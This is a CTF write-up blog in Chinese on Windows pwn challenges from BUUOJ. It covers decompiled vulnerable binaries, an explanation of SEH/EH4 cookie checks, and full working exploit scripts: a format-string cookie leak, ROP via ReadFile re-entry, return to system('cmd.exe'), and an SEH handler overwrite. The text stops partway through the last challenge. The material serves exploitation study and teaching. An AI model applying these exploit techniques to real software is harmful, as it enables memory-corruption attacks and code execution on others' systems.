BUUOJ 刷题记录 -- Windows Pwn

本来去年暑假开始学习windows pwn,奈何需要备战考研所以搁置了,现在重新捡起来开始学习,记录一下BUUOJ上做的几个windows pwn题,总的来说windows pwn相对于linux pwn会略显复杂,机制更为繁琐,但是两者仍有一些共通之处。

此外,有关windows的一些保护机制以及绕过方式,将会结合题目一起提到而并不打算单独拎出来做总结。其实这方面的内容网上也有非常多的参考资料,整理得也相当好了,我也就不做过多的重复工作,遇到的时候再稍做记录效率会高一些。

[Windows][inCTF2019]warmup

题目分析

逻辑很简单,程序先是提供了一个格式化字符串漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/*
 * fmt_str (IDA decompilation): prints a prompt, reads up to 0x150 bytes from
 * stdin into a heap buffer, then passes that buffer to printf as the format
 * string. Always returns 0.
 */
int fmt_str()
{
HANDLE hHeap; // [esp+0h] [ebp-2Ch]
void *lpBuffer; // [esp+4h] [ebp-28h]
char fmt[24]; // [esp+8h] [ebp-24h] BYREF
int v4; // [esp+20h] [ebp-Ch]
__int16 v5; // [esp+24h] [ebp-8h]

strcpy(fmt, "Tell me what you want :");
v4 = 0;
v5 = 0;
hHeap = GetProcessHeap();
// Flags value 8u is HEAP_ZERO_MEMORY in the Win32 headers; 0x150 bytes are requested.
lpBuffer = HeapAlloc(hHeap, 8u, 0x150u);
printf(fmt);
ReadFile(stdin, lpBuffer, 0x150u, 0, 0);
// The bytes just read are used directly as the format string: format-string bug.
printf((char *)lpBuffer);
printf("\n");
return 0;
}

后面直接给了个栈溢出:

1
2
3
4
5
6
7
8
9
10
11
/*
 * main (IDA decompilation): prints a banner, runs the format-string routine,
 * then reads a second input into a 64-byte stack buffer. Always returns 0.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
char Buffer[64]; // [esp+0h] [ebp-44h] BYREF

init_buf();
printf("Welcome ------ Banner\n");
j_fmt_str();
printf("Did you make something out of it ??? :");
// Requests 0x60 bytes into the 0x40-byte Buffer: stack overflow of up to 0x20 bytes.
ReadFile(stdin, Buffer, 0x60u, 0, 0);
return 0;
}

此外还提供了一个后门,直接读flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/*
 * backdoor (IDA decompilation): opens the file named by aFlag and copies its
 * contents to stdout in chunks of up to 0x20 bytes. Always returns 0.
 */
int backdoor()
{
DWORD NumberOfBytesWritten; // [esp+0h] [ebp-30h] BYREF
HANDLE hFile; // [esp+4h] [ebp-2Ch]
DWORD NumberOfBytesRead; // [esp+8h] [ebp-28h] BYREF
char Buffer[32]; // [esp+Ch] [ebp-24h] BYREF

// Win32 constants: 0x80000000 = GENERIC_READ, 3 = OPEN_EXISTING, 0x80 = FILE_ATTRIBUTE_NORMAL.
hFile = CreateFileA(aFlag, 0x80000000, 0, 0, 3u, 0x80u, 0);
// Copy loop: stops when ReadFile fails, reads zero bytes, or WriteFile fails.
while ( ReadFile(hFile, Buffer, 0x20u, &NumberOfBytesRead, 0)
&& NumberOfBytesRead
&& WriteFile(stdout, Buffer, NumberOfBytesRead, &NumberOfBytesWritten, 0) )
;
return 0;
}

利用思路

  1. 首先利用格式化字符串漏洞,读ebp,cookie和程序返回地址,从而得到程序加载的基地址。
  2. 由于栈溢出的字节数不够用,所以利用栈溢出劫持返回地址到0x00406D3E的位置(即下面push eax之后的那条指令,与exp中的PIE + 0x6D3E一致):
    1
    2
    3
    4
    5
    6
    7
    8
    .text:00406D34                 push    0               ; lpOverlapped
    .text:00406D36 push 0 ; lpNumberOfBytesRead
    .text:00406D38 push 60h ; '`' ; nNumberOfBytesToRead
    .text:00406D3A lea eax, [ebp+Buffer]
    .text:00406D3D push eax ; lpBuffer
    .text:00406D3E mov ecx, stdin
    .text:00406D44 push ecx ; hFile
    .text:00406D45 call ds:ReadFile
    这样,可以通过控制栈上传递给ReadFile的lpOverlapped、lpNumberOfBytesRead、nNumberOfBytesToRead(主要是这个)参数,实现再次栈溢出的效果,这样就可以读入一段更长的ROP。
  3. 但是由于远程环境中的flag是放在flag.txt里面的(简直坑爹),而后门里读的是/flag文件,显然直接跳到后门执行根本拿不到flag。
  4. 所以需要通过ROP把.data段上存放的”/flag”字符串给改成”./flag.txt”,再跳到后门执行即可。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
# Exploit script for warmup.exe.
# Stage 1: leak the stack cookie, saved ebp and a return address through the
#          format-string bug, and derive the image base (PIE) and the global
#          security cookie (GS) from them.
# Stage 2: overflow main's buffer and return into the ReadFile call sequence
#          with attacker-chosen arguments to read a longer second-stage payload.
# Stage 3: use ReadFile again to overwrite the flag path string in .data,
#          then return into the backdoor.
from winpwn import *
import sys

context.log_level = 'debug'
context.arch = 'i386'

p = process("./warmup.exe")
# Run with the single argument "1" to attach WinDbg to the local process.
if len(sys.argv) == 2 and sys.argv[1] == '1':
    windbgx.attach(p)

# p = remote("node3.buuoj.cn", 26586)

backdoor = 0x6C80
stack_offset = 12

# leak GS and ebp
payload = "%p " * 13
p.sendlineafter("Tell me what you want :", payload)
res = p.recvline()
# The last three "%p" fields of the reply are: cookie, ebp, return address.
PIE = int(res[-12:-4], 16) - 0x6D27
cookie = int(res[-30:-22], 16)
ebp = int(res[-21:-13], 16)
GS = cookie ^ (ebp - 0x4C)

# read gadget to ReadFile return address
payload = "A" * 0x40 + p32(GS ^ ebp)                    # cookie
payload += p32(ebp)                                     # ebp
payload += p32(PIE + 0x6D3E)                            # return address (ReadFile)
payload += p32(ebp) + p32(0x100) + p32(0) * 2           # args for ReadFile
p.sendafter("Did you make something out of it ??? :", payload)

# write gadget "pop ebp; ret" to return address of ReadFile to bypass canary check
# ------ NOTICE: __stdcall ------
# and write gadget to change string "./flag" on .data segment to "./flag.txt" and then return to backdoor
payload = p32(PIE + 0x6d59)                             # pop ebp; ret
payload += "A" * 0x14                                   # pop args
payload += p32(ebp + 0x34)
payload += p32(PIE + 0x6D3E)                            # return address (ReadFile)
payload += p32(PIE + 0x6301C) + p32(0x100) + p32(0) * 2 # args for ReadFile
payload += p32(GS ^ (ebp + 0x34))
payload += p32(0)                                       # where ebp points to
payload += p32(PIE + backdoor)                          # return to backdoor
p.send(payload)

# write "./flag.txt"
payload = "./flag.txt\x00"
# Short pause before sending the final payload as a separate write.
sleep(0.1)
p.send(payload)

print("[*] cookie: %s" % hex(cookie))
print("[*] ebp: %s" % hex(ebp))

p.interactive()

[Windows][Others]BabyROP

题目分析

整个程序逻辑很简单,也没开GS保护:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
/*
 * main (IDA decompilation): reads a name (at most 100 characters, up to a
 * newline) and echoes it, then reads a user-supplied length and that many
 * message characters into a second 100-byte stack buffer. Always returns 0.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
FILE *v3; // eax
int i; // esi
char v5; // al
FILE *v6; // eax
FILE *v7; // eax
int v8; // esi
int j; // ebx
char v10; // al
FILE *v11; // eax
char v13[100]; // [esp+Ch] [ebp-CCh] BYREF
char v14[100]; // [esp+70h] [ebp-68h] BYREF
int v15; // [esp+D4h] [ebp-4h] BYREF

puts("input your name");
v3 = _iob_func();
fflush(v3 + 1);
// Copies up to 100 characters into v14 and never writes a terminating NUL.
for ( i = 0; i < 100; ++i )
{
v5 = getchar();
if ( v5 == 10 )
break;
v14[i] = v5;
}
// With an unterminated v14, "%s" keeps printing whatever follows it on the stack.
printf("hello %s\n", v14);
v6 = _iob_func();
fflush(v6 + 1);
puts("input your message length");
v7 = _iob_func();
fflush(v7 + 1);
scanf("%d\n", &v15);
v8 = 0;
// The loop bound j is the user-supplied v15; it is never checked against sizeof(v13).
for ( j = v15; v8 < j; v13[v8++] = v10 )
{
v10 = getchar();
if ( v10 == 10 )
break;
}
puts("leave your message");
printf("your mesage is %s\n", v13);
printf("press enter to exit\n");
v11 = _iob_func();
fflush(v11 + 1);
getchar();
return 0;
}

首先输入的name没有末尾补0,所以可以利用这个leak出栈上残留的数据。
其次后面直接给了一次栈溢出的机会。

利用思路

  1. name的buffer后偏移为0x64的地方存有MSVCR100.dll中函数的地址,利用这个将MSVCR100.dll的基地址算出来,并得到MSVCR100.dll中的system和”cmd.exe”的地址。
  2. 利用栈溢出直接劫持返回地址,布置ROP执行system("cmd.exe")

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# Exploit script for babyrop.exe.
# Stage 1: fill the 100-byte name buffer so the "hello %s" echo leaks the
#          4 bytes that follow it, and derive the DLL base from that pointer.
# Stage 2: overflow the message buffer and return to system("cmd.exe").
from winpwn import *
import sys

context.log_level = 'debug'
context.arch = 'i386'

p = process("./babyrop.exe")
# Run with the single argument "1" to attach WinDbg to the local process.
if len(sys.argv) == 2 and sys.argv[1] == '1':
    windbgx.attach(p)

# p = remote("node3.buuoj.cn", 29890)

# Offsets relative to the leaked DLL base.
str_cmd_exe = 0x1ED0
system_offset = 0x307FB

# leak PIE
# 0x63 filler bytes plus "@" as a marker: exactly 100 bytes, so nothing
# terminates the name before the adjacent stack data.
payload = "A" * 0x63 + "@"
p.sendlineafter("input your name", payload)
p.recvuntil("@")
dll_base = u32(p.recv(4)) - 0x261b1
system = dll_base + system_offset
cmd_exe = dll_base + str_cmd_exe

# getshell
p.sendlineafter("input your message length", str(0x100))
# 0xCC bytes of padding, 4 bytes for saved ebp, then: return address = system,
# fake return address for system, and its single argument.
payload = 'A' * 0xCC + p32(0) + p32(system) + p32(0) + p32(cmd_exe)
p.sendline(payload)
p.sendlineafter("press enter to exit", "")

print("[*] dll_base: %s" % hex(dll_base))

p.interactive()

[Windows][HITBGSEC]BABYSHELLCODE

题目分析

程序开始的时候,先做一个简单的初始化操作:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
/*
 * init (IDA decompilation): disables buffering on two stdio streams, calls
 * init_scmgr (exiting if it returns a negative value), and fills the global
 * buf from a 32-dword table seeded with the address of init_scmgr.
 * Also sets key to 0 and enabled to 1. Always returns 0.
 */
int init()
{
_DWORD *v0; // ebx
FILE *v1; // eax
FILE *v2; // eax
int v3; // ecx

v0 = malloc(0x80u);
v1 = _acrt_iob_func(1u);
// Mode 4 is _IONBF in the MSVC headers (unbuffered).
setvbuf(v1, 0, 4, 0);
v2 = _acrt_iob_func(0);
setvbuf(v2, 0, 4, 0);
if ( init_scmgr() < 0 )
{
puts("error to init scmgr!");
exit(0);
}
v3 = 1;
// Seed: element 0 is the address of init_scmgr itself.
*v0 = init_scmgr;
// Each following element is the previous one multiplied by 0x10DCD.
do
{
v0[v3] = 0x10DCD * v0[v3 - 1];
++v3;
}
while ( v3 < 32 );
key = 0;
qmemcpy(buf, v0, sizeof(buf));
free(v0);
enabled = 1;
puts("Hey, Welcome to shellcode test system!");
return 0;
}

这里调用了一个自实现的scmgr.dll中的scmgr_init函数,以及利用init_scmgr的地址初始化了一个int[32]的buffer。

其中scmgr_init实现如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/*
 * init_scmgr (IDA decompilation): queries the system page size and allocates
 * a region of 20 pages, recording it in the globals addr and buffer_start.
 * Returns the allocated address on success, -1 if the allocation fails.
 */
int init_scmgr()
{
LPVOID v0; // eax
int result; // eax
struct _SYSTEM_INFO SystemInfo; // [esp+0h] [ebp-24h] BYREF

GetSystemInfo(&SystemInfo);
page_size = SystemInfo.dwPageSize;
max_size = 20 * SystemInfo.dwPageSize;
// Win32 constants: 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE.
v0 = VirtualAlloc(0, 20 * SystemInfo.dwPageSize, 0x1000u, 0x40u);
addr = (int)v0;
if ( v0 )
{
// NOTE(review): the (char) cast on a %p argument looks like a decompiler artifact — confirm against the disassembly.
printf("Global memory alloc at %p\n", (char)v0);
result = addr;
buffer_start = addr;
}
else
{
puts("Error to alloc globalmemory");
result = -1;
}
return result;
}

也就是分配出了20个page的内存供后续使用。

后面菜单提供add、show、delete、run四个基本功能,顾名思义,就是添加、打印、删除、执行shellcode的操作。
比较关键的是run这里:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
/*
 * run (IDA decompilation): reads a shellcode index, and if the slot is
 * populated, calls the stored code. While `enabled` is set, the code bytes
 * are first saved into a 100-byte stack buffer, the first dword of the code
 * is overwritten with -1, and the saved bytes are copied back after the call.
 * Returns 0 after running, -1 for an empty slot.
 */
int run()
{
int v0; // ebx
struct struct_shellcode *v1; // edi
int result; // eax
_DWORD *v3; // esi
char Src[100]; // [esp+10h] [ebp-80h] BYREF
CPPEH_RECORD ms_exc; // [esp+78h] [ebp-18h]

memset(Src, 0, sizeof(Src));
// TryLevel 0: the code below runs inside the function's first guarded scope.
ms_exc.registration.TryLevel = 0;
puts("shellcode index:");
v0 = read_n();
v1 = shellcode_array[v0];
if ( v1 )
{
if ( enabled )
{
v3 = (_DWORD *)v1->code;
// v1->length is not checked against sizeof(Src): a longer shellcode overflows
// Src towards ms_exc, which sits above it in the frame (ebp-80h vs ebp-18h).
memcpy(Src, v3, v1->length);
// Clobber the first 4 bytes of the stored code with 0xFFFFFFFF.
*v3 = -1;
}
((void (__thiscall *)(int))v1->code)(v1->code);
if ( enabled )
memcpy((void *)shellcode_array[v0]->code, Src, shellcode_array[v0]->length);
result = 0;
}
else
{
puts("invalid index");
ms_exc.registration.TryLevel = -2;
result = -1;
}
return result;
}

enabled == 1的情况下(其实总是1),调用memcpy(Src, v3, v1->length);向栈上的Src复制了一段shellcode,而这个shellcode的长度显然可以超过Src的长度100,所以这里存在一个栈溢出;其次,后面((void (__thiscall *)(int))v1->code)(v1->code);执行shellcode前,*v3 = -1;首先将shellcode的前4 bytes置了0xFFFFFFFF,所以肯定会触发错误,从而陷入到错误处理函数中执行,这里就涉及到windows的SEH机制。

SEH (Structured Exception Handling)

SEH(Structured Exception Handling)结构化异常处理是windows的一种异常处理机制,C语言中主要通过MSVC扩展的__try / __except(以及__finally)实现。
在代码层面,windows相应的函数栈上也会布置一种特殊的结构:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/*
 * Per-function SEH data as IDA lays it out on the stack: two bookkeeping
 * dwords followed by the exception registration record.
 */
typedef struct CPPEH_RECORD
{
DWORD old_esp;
DWORD exc_ptr;
_EH3_EXCEPTION_REGISTRATION registration;
}CPPEH_RECORD, *PCPPEH_RECORD;

/*
 * Exception registration record: link to another registration record, the
 * handler function, the scope-table pointer and the current try level.
 */
struct _EH3_EXCEPTION_REGISTRATION
{
  struct _EH3_EXCEPTION_REGISTRATION *Next;
  PVOID ExceptionHandler;
  PSCOPETABLE_ENTRY scopeTable;
  DWORD TryLevel;
};

其中:

  • prev指向下一个EXCEPTION_FRAME
  • handler为异常处理函数_except_handler4
  • scopetable是一个指针,指向PSCOPETABLE_ENTRY,在这里开启GS保护的情况下,它是:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    /* Scope table header: four cookie-related offsets, then one record per try level. */
    struct _EH4_SCOPETABLE {
    DWORD GSCookieOffset;
    DWORD GSCookieXOROffset;
    DWORD EHCookieOffset;
    DWORD EHCookieXOROffset;
    _EH4_SCOPETABLE_RECORD ScopeRecord[1];
    };

    /* One scope record: the enclosing level, a filter function, and a handler/finally function. */
    struct _EH4_SCOPETABLE_RECORD {
    DWORD EnclosingLevel;
    long (*FilterFunc)();
    union {
    void (*HandlerAddress)();
    void (*FinallyFunc)();
    };
    };
  • TryLevel可以视为对相应_EH4_SCOPETABLE中_EH4_SCOPETABLE_RECORD的一个索引。

从栈的布局上看(借用一张图),为:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
                                                ExceptionPointers
+-------------------+
+---------->| ExceptionRecord |
| +-------------------+
| | ContextRecord |
| +-------------------+
EH4 Stack |
+-------------------+ | Scope Table
Low | ...... | | +-------------------+
+-------------------+ | | GSCookieOffset |
ebp - 18h | esp | | +-------------------+
+-------------------+ | | GSCookieXorOffset |
ebp - 14h | ExceptionPointers |---+ +-------------------+
+-------------------+ | EHCookieOffset |
ebp - 10h | Next | +-------------------+
+-------------------+ | EHCookieXorOffset |
ebp - 0Ch | ExceptionHandler | +-------------------+
+-------------------+ +---------->| EncloseingLevel |---> 0xFFFFFFFE
ebp - 08h | Scope Table | | Level 0 +-------------------+
+-------------------+ | | FilterFunc |
ebp - 04h | TryLevel |---+ +-------------------+
+-------------------+ | | HandlerFunc |
ebp | ebp | | +-------------------+
+-------------------+ +---------->| EncloseingLevel |---> 0x00000000
High | ...... | Level 1 |-------------------+
+-------------------+ | FilterFunc |
+-------------------+
| HandlerFunc |
+-------------------+

检查_EH3_EXCEPTION_REGISTRATION->prev合法之后,会通过调用_EH3_EXCEPTION_REGISTRATION->ExceptionHandler,也就是_except_handler4函数进入异常处理流程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
/*
 * ValidateLocalCookies: recomputes the frame's cookie value(s) from the scope
 * table offsets and hands each one to cookieCheckFunction.
 *
 * cookieCheckFunction - callback that receives each recomputed value
 * scopeTable          - decoded scope table supplying the four offsets
 * framePointer        - base address the offsets are applied to
 */
void __cdecl ValidateLocalCookies(void (__fastcall *cookieCheckFunction)(unsigned int), _EH4_SCOPETABLE *scopeTable, char *framePointer)
{
unsigned int v3; // esi@2
unsigned int v4; // esi@3

// The GS cookie check is skipped when GSCookieOffset is -2.
if ( scopeTable->GSCookieOffset != -2 )
{
// value = *(framePointer + GSCookieOffset) XOR (framePointer + GSCookieXOROffset)
v3 = *(_DWORD *)&framePointer[scopeTable->GSCookieOffset] ^ (unsigned int)&framePointer[scopeTable->GSCookieXOROffset];
__guard_check_icall_fptr(cookieCheckFunction);
((void (__thiscall *)(_DWORD))cookieCheckFunction)(v3);
}
// The EH cookie is always checked, using the same XOR construction.
v4 = *(_DWORD *)&framePointer[scopeTable->EHCookieOffset] ^ (unsigned int)&framePointer[scopeTable->EHCookieXOROffset];
__guard_check_icall_fptr(cookieCheckFunction);
((void (__thiscall *)(_DWORD))cookieCheckFunction)(v4);
}

int __cdecl _except_handler4_common(unsigned int *securityCookies, void (__fastcall *cookieCheckFunction)(unsigned int), _EXCEPTION_RECORD *exceptionRecord, unsigned __int32 sehFrame, _CONTEXT *context)
{
// xor scope table
scopeTable_1 = (_EH4_SCOPETABLE *)(*securityCookies ^ *(_DWORD *)(sehFrame + 8));

// sehFrame is the address of _EH3_EXCEPTION_REGISTRATION at stack
framePointer = (char *)(sehFrame + 16);
scopeTable = scopeTable_1;

// Validate GS
ValidateLocalCookies(cookieCheckFunction, scopeTable_1, (char *)(sehFrame + 16));
__except_validate_context_record(context);

if ( exceptionRecord->ExceptionFlags & 0x66 )
{
......
}
else
{
exceptionPointers.ExceptionRecord = exceptionRecord;
exceptionPointers.ContextRecord = context;
tryLevel = *(_DWORD *)(sehFrame + 12);
*(_DWORD *)(sehFrame - 4) = &exceptionPointers;
if ( tryLevel != -2 )
{
while ( 1 )
{
v8 = tryLevel + 2 * (tryLevel + 2);
filterFunc = (int (__fastcall *)(_DWORD, _DWORD))*(&scopeTable_1->GSCookieXOROffset + v8);
scopeTableRecord = (_EH4_SCOPETABLE_RECORD *)((char *)scopeTable_1 + 4 * v8);
encloseingLevel = scopeTableRecord->EnclosingLevel;
scopeTableRecord_1 = scopeTableRecord;
if ( filterFunc )
{
// call FilterFunc
filterFuncRet = _EH4_CallFilterFunc(filterFunc);
......
if ( filterFuncRet > 0 )
{
......
// call HandlerFunc
_EH4_TransferToHandler(scopeTableRecord_1->HandlerFunc, v5 + 16);
......
}
}
......
tryLevel = encloseingLevel;
if ( encloseingLevel == -2 )
break;
scopeTable_1 = scopeTable;
}
......
}
}
......
}

简单描述一下这个流程:

  1. 首先通过xor解密_EH3_EXCEPTION_REGISTRATION->scopetable,得到相应的地址。
  2. 获取栈上存放的old ebp的位置(也就是当前栈的ebp,即framePointer),进行如下check:
    • 如果scopeTable->GSCookieOffset != -2,则保证ebp ^ cookie == __security_cookie,这里ebp就是当前函数栈的ebp,cookie也是当前栈的cookie,与函数返回前对GS进行check的逻辑一致。
    • 同理,(ebp + scopeTable->EHCookieXOROffset) ^ *(ebp + scopeTable->EHCookieOffset) == __security_cookie(注意偏移是加到ebp上的,例如后文exp中EHCookieOffset取0xffffff20,是一个负偏移)。
  3. 获取栈上存放的_EH3_EXCEPTION_REGISTRATION->tryLevel,检查该TryLevel != -2的情况下找到对应的_EH4_SCOPETABLE->_EH4_SCOPETABLE_RECORD
  4. 如果_EH4_SCOPETABLE_RECORD->FilterFunc不为空,则执行FilterFunc,返回值大于0则继续执行HandlerFunc

利用思路

  1. 首先利用程序最开始输入name再打印name,leak出栈上存放的ebp,cookie和return address,这样可以计算出__security_cookie、栈地址和程序基地址。
  2. 由于在init中,程序获取了scmgr_init的地址,并利用它生成了一个int[32]的buffer,如果调用5号功能,可以得到加密后的buffer内容,因此只要获得明文的buffer内容,我们就可以拿到scmgr_init的地址,进而获得scmgr.dll的基地址,获得其中存在的后门test_getshell的地址。
  3. 考虑该加密应该是单向散列,所以逆推不太可能;此外,scmgr_init的地址为scmgr.dll + 0x1090(与exp中爆破时使用的低2 bytes一致),而scmgr.dll的基址低2 bytes为0,所以只需要爆破高2 bytes即可,速度很快。
  4. 拿到scmgr.dll的基址,就可以利用run功能中的栈溢出,布置栈上的内容;只要伪造_EH3_EXCEPTION_REGISTRATION->ExceptionHandler为后门地址,加上_EH3_EXCEPTION_REGISTRATION->prev指向原来的地方,即可在触发异常的时候执行该后门getshell。

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
# Exploit script for babyshellcode.exe.
# Stage 1: leak the stack cookie, a saved ebp and a return address through the
#          name echo, and derive the image base and __security_cookie.
# Stage 2: fetch the "challenge code" (menu option 5) and brute-force the upper
#          16 bits of the scmgr.dll base by re-running the generator locally.
# Stage 3: add a shellcode long enough to overflow run()'s stack buffer and
#          overwrite the SEH registration record (next + handler), then run it.
from winpwn import *
import sys

context.log_level = 'error'
context.arch = 'i386'

p = process("./babyshellcode.exe")
# p = remote("node3.buuoj.cn", 29190)

def leave_name(name):
    """Answer the initial name prompt."""
    p.sendlineafter("leave your name", name)

def choose(choice):
    """Select a menu option."""
    p.sendlineafter("Option:", str(choice))

def add(size, shellcode):
    """Menu option 1: add a shellcode of the given size (name/description fixed to "AAA")."""
    choose(1)
    p.sendlineafter("shellcode size:", str(size))
    p.sendlineafter("shellcode name:", "AAA")
    p.sendlineafter("shellcode description:", "AAA")
    p.sendlineafter("shellcode:", shellcode)

def show():
    """Menu option 2."""
    choose(2)

def delete(idx):
    """Menu option 3: delete the shellcode at idx."""
    choose(3)
    p.sendlineafter("shellcode index:", str(idx))

def run(idx):
    """Menu option 4: run the shellcode at idx."""
    choose(4)
    p.sendlineafter("shellcode index:", str(idx))

def read_challenge_code():
    """Menu option 5 -> 1: return the challenge code as a list of ints.

    The code is printed as '-'-separated hex values; a dummy response is
    sent afterwards to get back to the menu.
    """
    choose(5)
    choose(1)
    p.recvuntil("Your challenge code is ")
    secret = p.recvline().strip().split('-')
    value_array = [int(item, 16) for item in secret]
    p.sendlineafter("challenge response:", "AAA")
    return value_array

def init_buf(val):
    """Rebuild the program's 32-dword table from seed val, plus 4 scratch slots."""
    buf = [val]
    for i in range(31):
        buf.append((buf[-1] * 0x10DCD) & 0xFFFFFFFF)
    # Slots 32..34 are written by encrypt(); slot 35 is allocated but unused here.
    for i in range(4):
        buf.append(0)
    return buf

def encrypt(buf, key):
    """One step of the challenge-code generator.

    Mutates buf in place and returns (buf, new_key, buf[new_key]).
    """
    v0 = ((1 << 8) + key - 1) & 0x1F
    v2 = buf[(key + 3) & 0x1F] ^ buf[key] ^ (buf[(key + 3) & 0x1F] >> 8)
    buf[32] = buf[v0]
    v1 = buf[32]
    buf[33] = v2
    v3 = buf[(key + 10) & 0x1F]
    v4 = buf[((1 << 8) + key - 8) & 0x1F] ^ v3 ^ (((v3 ^ (32 * buf[((1 << 8) + key - 8) & 0x1F])) << 14) & 0xFFFFFFFF)
    v5 = key & 0xFF
    buf[34] = v4
    buf[key] = v2 ^ v4
    buf[v0] = (v1 ^ v2 ^ v4 ^ ((v2 ^ (16 * (v1 ^ (4 * v4)))) << 7)) & 0xFFFFFFFF
    key = ((1 << 8) + v5 - 1) & 0x1F
    return buf, key, buf[key]

def bruteforce_scmgr(value_array):
    """Return the scmgr.dll base matching value_array, or None if none matches.

    Tries every upper-16-bit value with the fixed low half 0x1090 as the seed
    and compares the generated sequence against value_array in reverse order.
    """
    final_res = None
    for high2bytes in range(0x10000):
        addr = (high2bytes << 16) | 0x1090
        buf = init_buf(addr)
        key = 0
        success = True
        for item in value_array[::-1]:
            buf, key, res = encrypt(buf, key)
            # print(buf)
            if res != item:
                success = False
                break
        if success == True:
            final_res = high2bytes << 16
            break
    return final_res

# 0x10 filler bytes plus a 4-byte marker; the echo then leaks what follows.
leave_name("A" * 0x10 + "addr")
p.recvuntil("addr")
canary = u32(p.recv(4))
old_ebp = u32(p.recv(4))
text_base = u32(p.recv(4).strip().ljust(4, "\x00")) - 0x1AFA
ebp_of_main = old_ebp - 0x48
security_cookie = canary ^ ebp_of_main

# Sanity check: the computed image base must have its low 16 bits clear.
assert(text_base & 0xFFFF == 0)

# Run with the single argument "1" to attach WinDbg to the local process.
if len(sys.argv) == 2 and sys.argv[1] == '1':
    windbgx.attach(p)

cipher_array = read_challenge_code()
scmgr = bruteforce_scmgr(cipher_array)
assert(scmgr != None)

backdoor = scmgr + 0x1100
except_handler4 = text_base + 0x18A0
ebp_of_run = ebp_of_main - 0x34
buf_addr = ebp_of_run - 0x80
prev_seh = ebp_of_main + 0x38
# Src is at ebp-0x80 and the registration record starts at ebp-0x10,
# so 0x70 bytes of padding reach its Next field.
payload = "A" * 0x70                        # padding
payload += p32(prev_seh) + p32(backdoor)    # | next | exception_handler

add(len(payload), payload)
run(0)

print("[+] scmgr address is: " + hex(scmgr))
print("[+] text base is: " + hex(text_base))
print("[+] security_cookie is: " + hex(security_cookie))
print("[+] ebp of main is: " + hex(ebp_of_main))

p.interactive()

[Windows][HITBGSEC]BABYSTACK & [Windows][第五空间 2019 决赛]PWN9 & [Windows][SUCTF 2019]BabyStack

题目分析

首先该程序开启了SafeSEH保护(虽然winchecksec没识别出来)。
其次该程序逻辑十分简单:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
/*
 * main (IDA decompilation): prints the address of its stack buffer and of
 * main itself, then loops up to 10 times. Per iteration: "yes" reads an
 * address and prints the dword stored there, "no" leaves the loop, and any
 * other input triggers a 256-byte read into the 128-byte buffer.
 * Ends by calling exit(0).
 */
// positive sp value has been detected, the output may be wrong!
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
FILE *v3; // eax
FILE *v4; // eax
int v5; // [esp+20h] [ebp-C0h]
int v6; // [esp+24h] [ebp-BCh]
_DWORD *v7; // [esp+28h] [ebp-B8h]
int i; // [esp+2Ch] [ebp-B4h]
char v9[128]; // [esp+44h] [ebp-9Ch] BYREF
CPPEH_RECORD ms_exc; // [esp+C8h] [ebp-18h]

// TryLevel 0: the code below runs inside the function's first guarded scope.
ms_exc.registration.TryLevel = 0;
v3 = (FILE *)_acrt_iob_func(1);
// Mode 4 is _IONBF in the MSVC headers (unbuffered).
setvbuf(v3, 0, 4, 0);
v4 = (FILE *)_acrt_iob_func(0);
setvbuf(v4, 0, 4, 0);
puts("ouch! Do not kill me , I will tell you everything");
// Both a stack address (v9) and a code address (main) are disclosed up front.
printf("stack address = 0x%x\n", v9);
printf("main address = 0x%x\n", main);
for ( i = 0; i < 10; ++i )
{
puts("Do you want to know more?");
read_str((int)v9, 10);
// v6 is normalized to -1/0/1; 0 means the input equals "yes".
v6 = strcmp(v9, "yes");
if ( v6 )
v6 = v6 < 0 ? -1 : 1;
if ( v6 )
{
// Input is not "yes": "no" leaves the loop, anything else falls through to the long read.
v5 = strcmp(v9, "no");
if ( v5 )
v5 = v5 < 0 ? -1 : 1;
if ( !v5 )
break;
// Requests 256 bytes into the 128-byte v9; ms_exc lies above v9 in the frame (ebp-9Ch vs ebp-18h).
read_str((int)v9, 256);
}
else
{
puts("Where do you want to know");
// Arbitrary read: the user-supplied number is dereferenced as a pointer.
v7 = (_DWORD *)read_n();
printf("Address 0x%x value is 0x%x\n", v7, *v7);
}
}
ms_exc.registration.TryLevel = -2;
puts("I can tell you everything, but I never believe 1+1=2");
